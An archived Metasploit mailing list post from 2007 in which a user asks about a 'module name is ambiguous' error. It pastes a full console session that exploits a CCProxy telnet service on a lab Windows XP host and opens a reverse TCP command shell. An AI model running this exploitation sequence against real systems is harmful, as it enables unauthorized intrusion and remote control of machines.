Metasploit mailing list archives
Module name is ambiguous
From: patrick at aushack.com (Patrick Webster)
Date: Mon, 20 Aug 2007 22:43:20 +1000
Hi, Can anyone shed any light on this error? I couldn't find any references in the MSF code, so it may be a ruby thing? "[-] The name windows/proxy/ccproxy_telnet_ping is ambiguous." For example: Please use MSFUpdate to obtain the latest patches and exploits! [*] Starting the Metasploit Framework... ## ### ## ## ## ## #### ###### #### ##### ##### ## #### ###### ####### ## ## ## ## ## ## ## ## ## ## ### ## ####### ###### ## ##### #### ## ## ## ## ## ## ## ## # ## ## ## ## ## ## ##### ## ## ## ## ## ## ## #### ### ##### ##### ## #### #### #### ### ## =[ msf v3.1-dev + -- --=[ 228 exploits - 107 payloads + -- --=[ 17 encoders - 5 nops =[ 40 aux msf > use exploit/windows/proxy/ccproxy_telnet_ping msf exploit(ccproxy_telnet_ping) > set RHOST 192.168.195.131 RHOST => 192.168.195.131 msf exploit(ccproxy_telnet_ping) > rcheck [*] The target appears to be vulnerable. msf exploit(ccproxy_telnet_ping) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp msf exploit(ccproxy_telnet_ping) > set LHOST 192.168.195.1 LHOST => 192.168.195.1 msf exploit(ccproxy_telnet_ping) > rexploit [-] Exploit failed: A target has not been selected. msf exploit(ccproxy_telnet_ping) > show targets Exploit targets: Id Name -- ---- 0 Windows 2000 Pro All - English 1 Windows 2000 Pro All - Italian 2 Windows 2000 Pro All - French 3 Windows XP SP0/1 - English 4 Windows XP SP2 - English msf exploit(ccproxy_telnet_ping) > set TARGET 4 TARGET => 4 msf exploit(ccproxy_telnet_ping) > rexploit [*] Started reverse handler [*] Trying target Windows XP SP2 - English on host 192.168.195.131:23... [*] Exploit completed, but no session was created. msf exploit(ccproxy_telnet_ping) > rexploit [*] Started reverse handler [*] Trying target Windows XP SP2 - English on host 192.168.195.131:23... [*] Sending stage (474 bytes) [*] Command shell session 1 opened (192.168.195.1:4444 -> 192.168.195.131:1134) Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\admin\Desktop> Background session 1? [y/N] y msf exploit(ccproxy_telnet_ping) > use exploit/windows/proxy/ccproxy_telnet_ping [-] The name windows/proxy/ccproxy_telnet_ping is ambiguous. msf exploit(ccproxy_telnet_ping) > use exploit/windows/proxy/ccproxy_telnet_ping [-] The name windows/proxy/ccproxy_telnet_ping is ambiguous. msf exploit(ccproxy_telnet_ping) > back msf > use exploit/windows/proxy/ccproxy_telnet_ping [-] The name windows/proxy/ccproxy_telnet_ping is ambiguous. msf > use windows/proxy/ccproxy_telnet_ping msf exploit(ccproxy_telnet_ping) > TIA, -Patrick -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070820/0842d252/attachment.htm>
Current thread:
- Module name is ambiguous Patrick Webster (Aug 20)